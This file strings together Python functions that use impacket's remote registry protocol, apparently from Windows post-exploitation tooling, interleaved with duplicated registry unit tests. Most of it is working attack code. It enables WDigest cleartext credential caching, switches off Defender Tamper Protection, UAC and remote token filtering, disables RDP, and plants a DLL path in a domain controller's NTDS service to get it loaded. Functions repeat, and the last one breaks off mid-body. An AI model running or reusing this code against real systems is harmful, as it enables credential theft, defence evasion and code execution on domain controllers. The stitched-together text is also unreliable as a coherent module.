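def enable(self):
    """Enable WDigest cleartext credential caching on the target over MS-RRP.

    Starts RemoteRegistry through RemoteOperations, writes
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential
    as REG_DWORD 1, reads it back, and logs success only when the read-back is 1.
    The RRP binding is kept on self.rrp for the caller (side effect of the original).

    NOTE(review): UseLogonCredential=1 is the well-known switch that makes LSASS keep
    cleartext WDigest credentials in memory on KB2871997-era and later builds; it is a
    high-signal registry change for defenders. The "key created" wording is historical:
    this sets a value on an existing key.

    Reads: self.smbconnection, self.doKerb, self.logger (success/error).
    """
    remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
    remoteOps.enableRegistry()
    # RemoteOperations keeps the RRP DCE/RPC object private; reach in as the original did.
    self.rrp = remoteOps._RemoteOperations__rrp
    try:
        if self.rrp is not None:
            regHandle = rrp.hOpenLocalMachine(self.rrp)['phKey']
            keyHandle = None
            try:
                keyHandle = rrp.hBaseRegOpenKey(
                    self.rrp, regHandle,
                    'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
                )['phkResult']
                rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
                # Read back instead of trusting the write: a silently rejected write would
                # otherwise leave the operator believing cleartext creds are now cached.
                rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
                if int(data) == 1:
                    self.logger.success('UseLogonCredential registry key created successfully')
                else:
                    self.logger.error('UseLogonCredential read back as %r, expected 1' % (data,))
            finally:
                # Release the server-side key handles; the original leaked both.
                for handle in (keyHandle, regHandle):
                    if handle is not None:
                        try:
                            rrp.hBaseRegCloseKey(self.rrp, handle)
                        except Exception:
                            pass
    finally:
        # Best-effort teardown (restores the RemoteRegistry service state); never fatal.
        try:
            remoteOps.finish()
        except Exception:
            pass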
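def rdp_disable(self, context, smbconnection):
    """Disable inbound Remote Desktop on the target by writing fDenyTSConnections=1.

    Writes HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections
    as REG_DWORD 1 over MS-RRP (RemoteRegistry is started via RemoteOperations, without
    Kerberos) and reads it back; success is logged only when the read-back is 1.

    NOTE(review): only this one policy value is touched; the firewall rule and the
    TermService service are left alone. Removing RDP from a host you are working on
    also cuts off other operators/admins - make sure that is intended.

    Args:
        context: module context; only context.log (success/error) is used.
        smbconnection: an authenticated impacket SMBConnection to the target.
    """
    remoteOps = RemoteOperations(smbconnection, False)
    remoteOps.enableRegistry()
    dce = remoteOps._RemoteOperations__rrp
    try:
        if dce:
            regHandle = rrp.hOpenLocalMachine(dce)['phKey']
            keyHandle = None
            try:
                keyHandle = rrp.hBaseRegOpenKey(
                    dce, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Terminal Server'
                )['phkResult']
                rrp.hBaseRegSetValue(dce, keyHandle, 'fDenyTSConnections\x00', rrp.REG_DWORD, 1)
                # Read back rather than trusting the write.
                rtype, data = rrp.hBaseRegQueryValue(dce, keyHandle, 'fDenyTSConnections\x00')
                if int(data) == 1:
                    context.log.success('RDP disabled successfully')
                else:
                    context.log.error('fDenyTSConnections read back as %r, expected 1' % (data,))
            finally:
                # Release the server-side key handles; the original leaked both.
                for handle in (keyHandle, regHandle):
                    if handle is not None:
                        try:
                            rrp.hBaseRegCloseKey(dce, handle)
                        except Exception:
                            pass
    finally:
        # Best-effort teardown (restores the RemoteRegistry service state); never fatal.
        try:
            remoteOps.finish()
        except Exception:
            pass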
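def wdigest_enable(self, context, smbconnection):
    """Enable WDigest cleartext credential caching on the target over MS-RRP.

    Starts RemoteRegistry through RemoteOperations (no Kerberos), writes
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential
    as REG_DWORD 1, reads it back and logs success only when the read-back is 1.

    NOTE(review): UseLogonCredential=1 is the switch that makes LSASS keep cleartext
    WDigest credentials in memory on KB2871997-era and later builds; it is a
    high-signal registry change for defenders. The "key created" wording is
    historical: this sets a value on an existing key.

    Args:
        context: module context; only context.log (success/error) is used.
        smbconnection: an authenticated impacket SMBConnection to the target.
    """
    remoteOps = RemoteOperations(smbconnection, False)
    remoteOps.enableRegistry()
    dce = remoteOps._RemoteOperations__rrp
    try:
        if dce:
            regHandle = rrp.hOpenLocalMachine(dce)['phKey']
            keyHandle = None
            try:
                keyHandle = rrp.hBaseRegOpenKey(
                    dce, regHandle,
                    'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
                )['phkResult']
                rrp.hBaseRegSetValue(dce, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
                # Read back rather than trusting the write.
                rtype, data = rrp.hBaseRegQueryValue(dce, keyHandle, 'UseLogonCredential\x00')
                if int(data) == 1:
                    context.log.success('UseLogonCredential registry key created successfully')
                else:
                    context.log.error('UseLogonCredential read back as %r, expected 1' % (data,))
            finally:
                # Release the server-side key handles; the original leaked both.
                for handle in (keyHandle, regHandle):
                    if handle is not None:
                        try:
                            rrp.hBaseRegCloseKey(dce, handle)
                        except Exception:
                            pass
    finally:
        # Best-effort teardown (restores the RemoteRegistry service state); never fatal.
        try:
            remoteOps.finish()
        except Exception:
            pass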
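def start(remoteName, remoteHost, username, password, dllPath):
    """Plant a DLL path in the NTDS service's DirectoryServiceExtPt value, trigger it, remove it.

    Connects to the remote registry over SMB (\\\\pipe\\winreg, port 445) with a plain
    username/password, writes
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt as REG_SZ =
    dllPath, calls trigger_samr() (the tool's premise is that this makes the DC load
    the DLL named there), and finally deletes the value again.

    NOTE(review): remoteName is accepted for interface compatibility but unused; the
    transport is built from remoteHost only. dllPath must be resolvable from the
    target (local path or UNC) - nothing here validates it. The value is now removed
    in a finally block so a failed or interrupted trigger no longer leaves a
    persistent DLL-load path behind in the NTDS service configuration.

    Prints progress to stdout and returns None on every path.
    """
    print("[*] Connecting to remote registry")
    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg', username, password, "", "", "", "")
    except Exception as e:
        print("[x] Error establishing SMB connection: %s" % e)
        return
    try:
        # Bind the winreg named pipe to the MS-RRP interface.
        rrpclient = rpctransport.get_dce_rpc()
        rrpclient.connect()
        rrpclient.bind(rrp.MSRPC_UUID_RRP)
    except Exception as e:
        print("[x] Error binding to remote registry: %s" % e)
        return
    print("[*] Connection established")
    # The original message said "...ExtPtr"; the value actually written is DirectoryServiceExtPt.
    print("[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt")
    try:
        hRootKey = rrp.hOpenLocalMachine(rrpclient)['phKey']
        subkey = rrp.hBaseRegOpenKey(rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
        # REG_SZ (== 1, the literal the original used): the DLL path is a plain string value.
        rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"], "DirectoryServiceExtPt", rrp.REG_SZ, dllPath)
    except Exception as e:
        print("[x] Error communicating with remote registry: %s" % e)
        return
    print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))
    try:
        trigger_samr(remoteHost, username, password)
    finally:
        # Always remove the value, even if the trigger raised, so a failed run does
        # not leave a persistent DLL-load path in the NTDS service configuration.
        print("[*] Removing registry entry")
        try:
            rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"], "DirectoryServiceExtPt")
            removed = True
        except Exception as e:
            print("[x] Error deleting from remote registry: %s" % e)
            removed = False
        # Release server-side handles and drop the pipe; best-effort only.
        for handle in (subkey["phkResult"], hRootKey):
            try:
                rrp.hBaseRegCloseKey(rrpclient, handle)
            except Exception:
                pass
        try:
            rrpclient.disconnect()
        except Exception:
            pass
    if not removed:
        return
    print("[*] All done")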
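def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Round-trip create key / set value / query / delete under HKEY_CLASSES_ROOT.

    Writes to the live target's registry (HKCR\\BETO), so it must only run against a
    disposable test host. Cleanup (delete key, close handles) is in a finally block so
    a failing set or query no longer leaves the BETO key behind on the target.
    """
    dce, rpctransport, phKey = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    resp.dump()
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
    resp.dump()
    phKey = resp['phkResult']
    data = None
    try:
        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
            resp.dump()
        except Exception as e:
            # Kept from the original: a failed set is reported, and the query below
            # (plus the final assertion) decides the outcome.
            print(e)
        # 'valueType' instead of 'type' so the builtin is not shadowed.
        valueType, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
        resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
        resp.dump()
    finally:
        # Always remove the test key; a key with values but no subkeys can be deleted.
        resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
        resp.dump()
        for handle in (phKey, regHandle):
            try:
                rrp.hBaseRegCloseKey(dce, handle)
            except Exception:
                pass
    self.assertEqual('HOLA COMO TE VA\x00', data)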
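def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Round-trip create key / set value / query / delete under HKEY_CLASSES_ROOT.

    Python 3 version of the original (which used the Python 2 `print e` statement).
    Writes to the live target's registry (HKCR\\BETO), so it must only run against a
    disposable test host. Cleanup (delete key, close handles) is in a finally block so
    a failing set or query no longer leaves the BETO key behind on the target.
    """
    dce, rpctransport, phKey = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    resp.dump()
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
    resp.dump()
    phKey = resp['phkResult']
    data = None
    try:
        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00')
            resp.dump()
        except Exception as e:
            # Kept from the original: a failed set is reported, and the query below
            # (plus the final assertion) decides the outcome.
            print(e)
        # 'valueType' instead of 'type' so the builtin is not shadowed.
        valueType, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00')
        resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00')
        resp.dump()
    finally:
        # Always remove the test key; a key with values but no subkeys can be deleted.
        resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00')
        resp.dump()
        for handle in (phKey, regHandle):
            try:
                rrp.hBaseRegCloseKey(dce, handle)
            except Exception:
                pass
    self.assertEqual('HOLA COMO TE VA\x00', data)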
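def disableTamper(self, dce):
    """Try to switch off Defender Tamper Protection by writing TamperProtection=0.

    Creates/opens HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features, writes the
    TamperProtection value as REG_DWORD 0, then reads it back and only prints the
    "now off" highlight when the read-back is 0. Failures go to logging.debug plus a
    self.logger.error line; the method returns None on every path.

    NOTE(review): on current Defender builds this value is itself guarded by Tamper
    Protection and the Features key is ACL-restricted, so the RPC write is commonly
    rejected or ignored. Even a 0 read-back only proves the registry value, not the
    effective state on the host - treat the highlight as "value written", not
    "protection off".

    Args:
        dce: a bound MS-RRP DCE/RPC connection (impacket rrp).
    """
    try:
        ans = rrp.hOpenLocalMachine(dce)  # handle to HKEY_LOCAL_MACHINE
        regHandle = ans['phKey']
    except Exception as e:
        logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e))
        return
    try:
        # Create-or-open: the Features key may be absent.
        resp = rrp.hBaseRegCreateKey(dce, regHandle, 'SOFTWARE\\Microsoft\\Windows Defender\\Features')
        keyHandle = resp['phkResult']
    except Exception as e:
        logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e))
        try:
            rrp.hBaseRegCloseKey(dce, regHandle)
        except Exception:
            pass
        return
    try:
        rrp.hBaseRegSetValue(dce, keyHandle, 'TamperProtection\x00', rrp.REG_DWORD, 0)
        # Verify: do not announce success for a write the server silently ignored.
        rtype, data = rrp.hBaseRegQueryValue(dce, keyHandle, 'TamperProtection\x00')
        if int(data) == 0:
            self.logger.highlight('TamperProtection Key Set! TamperProtection is now off!')
        else:
            logging.debug('TamperProtection read back as %r, expected 0', data)
            self.logger.error('Could not set TamperProtection Key')
    except Exception as e:
        # The original debug line named "EnableLUA" here (copy-paste); fixed.
        logging.debug('Exception thrown when hBaseRegSetValue TamperProtection: %s', str(e))
        self.logger.error('Could not set TamperProtection Key')
    finally:
        # Release the server-side key handles; the original leaked both.
        for handle in (keyHandle, regHandle):
            try:
                rrp.hBaseRegCloseKey(dce, handle)
            except Exception:
                pass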
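def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
    """Round-trip create key / set value / query / delete under HKEY_CLASSES_ROOT.

    Writes to the live target's registry (HKCR\\<self.test_key>), so it must only run
    against a disposable test host. Cleanup (delete key, close handles) is in a
    finally block so a failing set or query no longer leaves the key behind.
    Reads self.test_key, self.test_value_name and self.test_value_data.
    """
    dce, rpctransport = self.connect()
    resp = rrp.hOpenClassesRoot(dce)
    resp.dump()
    regHandle = resp['phKey']
    resp = rrp.hBaseRegCreateKey(dce, regHandle, self.test_key)
    resp.dump()
    phKey = resp['phkResult']
    data = None
    try:
        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, self.test_value_name, rrp.REG_SZ, self.test_value_data)
            resp.dump()
        except Exception as e:
            # Kept from the original: a failed set is reported, and the query below
            # (plus the final assertion) decides the outcome.
            print(e)
        # 'valueType' instead of 'type' so the builtin is not shadowed.
        valueType, data = rrp.hBaseRegQueryValue(dce, phKey, self.test_value_name)
        resp = rrp.hBaseRegDeleteValue(dce, phKey, self.test_value_name)
        resp.dump()
    finally:
        # Always remove the test key; a key with values but no subkeys can be deleted.
        resp = rrp.hBaseRegDeleteKey(dce, regHandle, self.test_key)
        resp.dump()
        for handle in (phKey, regHandle):
            try:
                rrp.hBaseRegCloseKey(dce, handle)
            except Exception:
                pass
    self.assertEqual(self.test_value_data, data)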
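def enableUAC(self, dce):
    """Disable UAC and remote token filtering on the target via remote registry.

    Despite the name this *turns off* UAC: it writes
    HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA = 0 and
    LocalAccountTokenFilterPolicy = 1, creating the policy key if it does not exist.
    Each value is read back after the write so the "Key Set!" line is only printed
    for a value that actually landed; a failed write is logged and the next value is
    still attempted (as in the original).

    NOTE(review): EnableLUA is only honoured after a reboot, whereas
    LocalAccountTokenFilterPolicy=1 affects new network logons right away (it is the
    switch that gives non-built-in local admins an unfiltered token over SMB/WMI).
    Both are well-known detection points - confirm against the target build before
    relying on either.

    Args:
        dce: a bound MS-RRP DCE/RPC connection (impacket rrp).
    Logs through self.logger (highlight/error) and the module-level logging.debug.
    """
    try:
        ans = rrp.hOpenLocalMachine(dce)
        regHandle = ans['phKey']
    except Exception as e:
        logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e))
        return
    try:
        # Create-or-open: the Policies\System key may be absent on a fresh box.
        resp = rrp.hBaseRegCreateKey(
            dce, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
        )
        keyHandle = resp['phkResult']
    except Exception as e:
        logging.debug('Exception thrown when hBaseRegCreateKey: %s', str(e))
        try:
            rrp.hBaseRegCloseKey(dce, regHandle)
        except Exception:
            pass
        return
    try:
        # (value name, wanted DWORD) - processed in the original's order.
        for valueName, wanted in (('EnableLUA', 0), ('LocalAccountTokenFilterPolicy', 1)):
            try:
                rrp.hBaseRegSetValue(dce, keyHandle, valueName + '\x00', rrp.REG_DWORD, wanted)
                # Verify: do not announce success for a write the server silently ignored.
                rtype, data = rrp.hBaseRegQueryValue(dce, keyHandle, valueName + '\x00')
                if int(data) == wanted:
                    self.logger.highlight('%s Key Set!' % valueName)
                else:
                    logging.debug('%s read back as %r, expected %d', valueName, data, wanted)
                    self.logger.error('Could not set %s Key' % valueName)
            except Exception as e:
                logging.debug('Exception thrown when hBaseRegSetValue %s: %s', valueName, str(e))
                self.logger.error('Could not set %s Key' % valueName)
    finally:
        # Release the server-side key handles; the original leaked both.
        for handle in (keyHandle, regHandle):
            try:
                rrp.hBaseRegCloseKey(dce, handle)
            except Exception:
                pass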
def add(self, dce, keyName):
    """Create a subkey, or set a value on an existing key, in the remote registry.

    keyName is a full path such as HKLM\\SOFTWARE\\Foo\\Bar. With no -v option the last
    path component is created as a new subkey under its parent; with -v/-vt/-vd the key
    is opened and the named value is set to the given type and data. Integer-typed
    REG_* values are converted with int(); everything else is passed through as typed.
    Results are printed, nothing is returned.

    NOTE(review): -vt is resolved by name on the rrp module and must start with REG_.
    Non-integer types (REG_SZ, REG_BINARY, ...) receive the raw command-line string,
    so the on-the-wire encoding is whatever rrp.hBaseRegSetValue does with a str -
    check that for REG_BINARY before relying on it.

    Args:
        dce: a bound MS-RRP DCE/RPC connection.
        keyName: registry path including the hive prefix.
    """
    # READ_CONTROL | KEY_SET_VALUE | KEY_CREATE_SUB_KEY should equal KEY_WRITE (0x20006).
    wantedAccess = READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY
    hRootKey, subKey = self.__strip_root_key(dce, keyName)
    valueName = self.__options.v

    if valueName is None:
        # Subkey creation: open the parent first (acts as a permission probe; its
        # handle is not reused), then create the leaf under the root handle.
        newSubKey = subKey
        parentKey = '\\'.join(subKey.split('\\')[:-1])
        rrp.hBaseRegOpenKey(dce, hRootKey, parentKey, samDesired=wantedAccess)
        created = rrp.hBaseRegCreateKey(dce, hRootKey, newSubKey, samDesired=wantedAccess)
        if created['ErrorCode'] == 0:
            print('Successfully set subkey %s' % (keyName))
        else:
            print('Error 0x%08x while creating subkey %s' % (created['ErrorCode'], keyName))
        return

    # Value write on an existing key.
    opened = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=wantedAccess)
    typeName = self.__options.vt
    dwType = getattr(rrp, typeName, None)
    if not typeName.startswith('REG_') or dwType is None:
        raise Exception('Error parsing value type %s' % typeName)
    integerTypes = (
        rrp.REG_DWORD, rrp.REG_DWORD_BIG_ENDIAN, rrp.REG_DWORD_LITTLE_ENDIAN,
        rrp.REG_QWORD, rrp.REG_QWORD_LITTLE_ENDIAN,
    )
    # Integer types must be ints for packValue; everything else goes through as-is.
    valueData = int(self.__options.vd) if dwType in integerTypes else self.__options.vd
    result = rrp.hBaseRegSetValue(dce, opened['phkResult'], valueName, dwType, valueData)
    if result['ErrorCode'] == 0:
        print('Successfully set key %s\\%s of type %s to value %s' % (
            keyName, valueName, typeName, valueData))
    else:
        print('Error 0x%08x while setting key %s\\%s of type %s to value %s' % (
            result['ErrorCode'], keyName, valueName, typeName, valueData))
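def wdigest_enable(self, context, smbconnection):
    """Enable WDigest cleartext credential caching on the target over MS-RRP.

    Starts RemoteRegistry through RemoteOperations (no Kerberos), writes
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential
    as REG_DWORD 1, reads it back and logs success only when the read-back is 1.

    NOTE(review): UseLogonCredential=1 is the switch that makes LSASS keep cleartext
    WDigest credentials in memory on KB2871997-era and later builds; it is a
    high-signal registry change for defenders. The "key created" wording is
    historical: this sets a value on an existing key.

    Args:
        context: module context; only context.log (success/error) is used.
        smbconnection: an authenticated impacket SMBConnection to the target.
    """
    remoteOps = RemoteOperations(smbconnection, False)
    remoteOps.enableRegistry()
    dce = remoteOps._RemoteOperations__rrp
    try:
        if dce:
            regHandle = rrp.hOpenLocalMachine(dce)['phKey']
            keyHandle = None
            try:
                keyHandle = rrp.hBaseRegOpenKey(
                    dce, regHandle,
                    'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
                )['phkResult']
                rrp.hBaseRegSetValue(dce, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
                # Read back rather than trusting the write.
                rtype, data = rrp.hBaseRegQueryValue(dce, keyHandle, 'UseLogonCredential\x00')
                if int(data) == 1:
                    context.log.success('UseLogonCredential registry key created successfully')
                else:
                    context.log.error('UseLogonCredential read back as %r, expected 1' % (data,))
            finally:
                # Release the server-side key handles; the original leaked both.
                for handle in (keyHandle, regHandle):
                    if handle is not None:
                        try:
                            rrp.hBaseRegCloseKey(dce, handle)
                        except Exception:
                            pass
    finally:
        # Best-effort teardown (restores the RemoteRegistry service state); never fatal.
        try:
            remoteOps.finish()
        except Exception:
            pass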
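def enable(self):
    """Enable WDigest cleartext credential caching on the target over MS-RRP.

    Starts RemoteRegistry through RemoteOperations, writes
    HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential
    as REG_DWORD, reads it back, and logs success only when the read-back is 1.
    The RRP binding is kept on self.rrp for the caller (side effect of the original).

    NOTE(review): the DWORD is written as the raw 2-byte string '\\x01\\x00' rather than
    the int 1 the sibling helpers use. That presumes an rrp.hBaseRegSetValue that sends
    lpData exactly as given (older impacket); newer impacket packs REG_DWORD itself with
    struct.pack('<L', value) and will not accept a str here. Left unchanged to preserve
    behaviour - verify against the pinned impacket version.

    NOTE(review): UseLogonCredential=1 is the well-known switch that makes LSASS keep
    cleartext WDigest credentials in memory on KB2871997-era and later builds; it is a
    high-signal registry change for defenders.

    Reads: self.smbconnection, self.doKerb, self.logger (success/error).
    """
    remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
    remoteOps.enableRegistry()
    # RemoteOperations keeps the RRP DCE/RPC object private; reach in as the original did.
    self.rrp = remoteOps._RemoteOperations__rrp
    try:
        if self.rrp is not None:
            regHandle = rrp.hOpenLocalMachine(self.rrp)['phKey']
            keyHandle = None
            try:
                keyHandle = rrp.hBaseRegOpenKey(
                    self.rrp, regHandle,
                    'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
                )['phkResult']
                rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00')
                # Read back instead of trusting the write.
                rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
                if int(data) == 1:
                    self.logger.success('UseLogonCredential registry key created successfully')
                else:
                    self.logger.error('UseLogonCredential read back as %r, expected 1' % (data,))
            finally:
                # Release the server-side key handles; the original leaked both.
                for handle in (keyHandle, regHandle):
                    if handle is not None:
                        try:
                            rrp.hBaseRegCloseKey(self.rrp, handle)
                        except Exception:
                            pass
    finally:
        # Best-effort teardown (restores the RemoteRegistry service state); never fatal.
        try:
            remoteOps.finish()
        except Exception:
            pass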
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) #resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') #resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') #resp.dump() except Exception, e: print e